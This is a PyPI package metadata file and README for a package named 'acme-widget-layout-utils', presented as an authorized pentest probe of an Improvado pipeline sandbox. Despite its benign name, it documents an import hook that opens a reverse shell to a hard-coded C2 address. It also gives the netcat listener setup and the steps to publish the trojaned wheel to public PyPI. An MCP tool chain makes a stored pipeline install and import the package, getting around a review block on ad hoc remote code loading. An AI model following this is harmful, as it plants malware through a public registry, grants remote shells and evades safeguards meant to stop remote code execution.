Metadata-Version: 2.4
Name: acme-widget-layout-utils
Version: 0.0.3
Summary: Pipeline hook probe v0.0.3 — authorized pentest C2 target 34.69.137.236:80
Requires-Python: >=3.9
Description-Content-Type: text/markdown

# acme-widget-layout-utils

Authorized **Improvado pipeline sandbox** probe package ([PyPI](https://pypi.org/project/acme-widget-layout-utils/)).

| Version | Import-hook behavior |
|---------|---------------------|
| `0.0.1` | `socket.connect("127.0.0.1", 1)` + markers |
| `0.0.2` | `dup2` + `/bin/sh -i` → `127.0.0.1:1` (PoC; Connection refused without listener) |
| `0.0.3+` | Edit `__init__.py` C2 target before publish (pentest only) |

## Install-hook (`setup.py`)

On sdist build/install: writes `/tmp/pypi_install_hook_marker.txt`, prints `PYPI_INSTALL_HOOK_RAN`.

Triggered on worker only with:

```bash
pip install --no-binary :all: --target /tmp/pkgs acme-widget-layout-utils==0.0.2
```

Plain `pip install` of wheel does **not** run install-hook.

## Full C2 pentest (stored pipeline)

### 1. Listener on VPS (`34.69.137.236:80`)

```bash
sudo rlwrap nc -lvnp 80
```

Port 80 needs root. Ensure firewall allows **inbound TCP 80** from Improvado worker egress (~`54.x` seen in probes).

### 2. Publish wheel pointing at your listener

```bash
# Edit src/acme_widget_layout_utils/__init__.py:
#   _sock.connect(("34.69.137.236", 80))
# Bump version in pyproject.toml → 0.0.3

cd scripts/fixtures/acme_widget_layout_utils
python3 -m venv .publish-venv
.publish-venv/bin/pip install build twine
.publish-venv/bin/python -m build
TWINE_USERNAME=__token__ TWINE_PASSWORD='pypi-…' .publish-venv/bin/python -m twine upload dist/*
```

### 3. MCP chain

```python
# createCustomPipelineTool(name=..., code="print('init')")
# updateCustomPipelineTool(code="""
import subprocess, sys
from pathlib import Path
target = "/tmp/acme_rev"
Path(target).mkdir(parents=True, exist_ok=True)
subprocess.run([sys.executable, "-m", "pip", "install", "--target", target,
                "acme-widget-layout-utils==0.0.3"], capture_output=True, text=True, timeout=180)
sys.path.insert(0, target)
import acme_widget_layout_utils
print("done")
# """)
# executeCustomPipelineTool(pipeline_id=...) → poll getPipelineRunResultTool
```

**Adhoc `runCustomPipelineCodeTool` with same body → review blocks (`REMOTE_CODE_LOADING`).**

### Repro script

```bash
python3 scripts/v15_pip_hooks_probe_live.py
```

Not for production. Remove/yank test versions after pentest.
